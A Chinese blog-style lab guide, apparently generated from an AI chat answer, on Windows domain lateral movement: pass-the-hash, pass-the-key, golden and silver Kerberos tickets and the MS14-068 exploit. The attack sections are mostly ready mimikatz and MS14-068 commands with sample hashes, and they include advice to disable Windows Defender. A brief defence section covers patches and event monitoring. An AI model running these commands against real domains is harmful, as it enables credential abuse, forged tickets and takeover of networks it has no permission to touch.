域渗透(web安全)

根据提供的系统版本(Windows 7 SP1、Windows 10 LTSC 2019、Windows Server 2012 R2)和攻击类型(PTH/PTK/PTT/黄金票据/白银票据),以下是适配性分析及操作建议:


一、PTH(Pass the Hash)横向攻击适配性

1. Windows 7 SP1
  • 支持性:完全支持(默认未安装KB2871997补丁)

  • 攻击条件

    • 未打补丁时,所有用户均可通过LM/NTLM哈希传递

    • 若已安装KB2871997补丁,仅支持Administrator用户传递

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:administrator /domain:mamba.com /ntlm:168665b84b96d6973f867364f53b0180"
  • 防御绕过:需关闭Windows Defender实时监控(通过注册表或组策略)13

2. Windows 10 LTSC 2019
  • 支持性:受限(默认集成KB2871997补丁)

  • 攻击条件:仅支持Administrator用户的NTLM哈希传递

  • 限制:若启用Credential Guard或LSA保护,需额外绕过措施7

3. Windows Server 2012 R2
  • 支持性:受限(默认安装KB2871997补丁)

  • 攻击条件:仅支持Administrator用户,且需目标开放SMB服务(445端口)

  • 推荐场景:优先使用PTK(AES256)或PTT攻击26


二、PTK(Pass the Key)横向攻击适配性

1. Windows 7 SP1
  • 支持性:需手动安装KB2871997补丁后可用

  • 攻击条件 :需获取AES256密钥(通过sekurlsa::ekeys

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:mamba /domain:mamba.com /aes256:a7ddbb2c4b7216746b8c523cf7995d2ed4c29f2ee4b795175b5ffce97ded3387"
2. Windows 10 LTSC 2019
  • 支持性:完全支持(默认启用AES加密)

  • 优势:绕过NTLM限制,支持所有用户传递9

3. Windows Server 2012 R2
  • 支持性:完全支持(补丁默认生效)

  • 适用场景:针对禁用NTLM的域环境,需结合服务识别(如LDAP/CIFS)6


三、PTT(Pass the Ticket)横向攻击适配性

1. 黄金票据(Golden Ticket)
  • 适用系统:所有系统(依赖域控权限)

  • 攻击条件

    • 获取krbtgt用户的NTLM Hash(lsadump::dcsync

    • 域名、域SID信息

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /admin:administrator /domain:mamba.com /sid:S-1-5-21-XXXX /krbtgt:be0e527500207aa091f504474347f48b /ticket:golden.kirbi"
    kerberos::ptt golden.kirbi
  • 适配性:适用于所有系统,但需域控(如Server 2012 R2)未启用AES强制加密37

2. 白银票据(Silver Ticket)
  • 适用系统:所有系统(需目标服务支持)

  • 攻击条件

    • 服务账户的NTLM Hash(如CIFS/SQL Server)

    • 域名、域SID、服务SPN

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /user:mamba /domain:mamba.com /sid:S-1-5-21-XXXX /target:dc.mamba.com /service:cifs /rc4:08972e15b1763a8537f276b159840c17 /ticket:silver.kirbi"
  • 适配性:尤其适合Windows Server 2012 R2(常见域控服务如CIFS/LDAP)8

3. MS14-068漏洞利用
  • 适用系统:仅未打补丁的Windows Server 2012 R2及更早版本

  • 限制:需普通域用户权限,且目标域控未安装KB3011780补丁

  • 实验步骤

    bash

    复制

    复制代码
    MS14-068.exe -u mamba3@mamba.com -s S-1-5-21-XXXX -d 192.168.128.128 -p Zrs123456..
    kerberos::ptc TGT_administrator@mamba.com.ccache
  • 适配性:Windows 7/Server 2012 R2可能适用,Windows 10已修复17


四、靶机适配性总结

攻击类型 Windows 7 SP1 Windows 10 LTSC 2019 Windows Server 2012 R2
PTH(NTLM) ✅(未打补丁) ⚠️(仅Administrator) ⚠️(仅Administrator)
PTK(AES256) ⚠️(需补丁)
黄金票据 ✅(最佳适配域控)
白银票据 ✅(CIFS服务) ✅(需服务支持) ✅(最佳适配CIFS/LDAP)
MS14-068漏洞 ❌(已修复) ⚠️(需未打补丁)

五、防御建议

  1. 补丁管理:确保所有系统安装KB2871997(PTH限制)、KB3011780(MS14-068修复)27

  2. 加密策略:强制使用AES256替代RC4,禁用NTLM协议3

  3. 日志监控:审计Kerberos票据事件(事件ID 4769/4771),检测异常票据生成8

  4. 权限控制:限制本地管理员账户同名问题,启用LSA保护9

如需进一步验证攻击路径,可使用systeminfo查看补丁状态,或通过BloodHound分析域内信任关系。

相关推荐
运维开发王义杰3 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习5 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
(:满天星:)5 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos
加密狗复制模拟6 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
野蛮人6号7 小时前
虚拟机网络编译器还原默认设置后VMnet8和VMnet1消失了
网络·vmware·虚拟机网络编译器·vmnet8消失
galaxylove7 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu7 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司8 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
面朝大海,春不暖,花不开8 小时前
Java网络编程:TCP/UDP套接字通信详解
java·网络·tcp/ip
ChicagoTypewriter8 小时前
计算机网络中的常用表项梳理
网络·计算机网络·智能路由器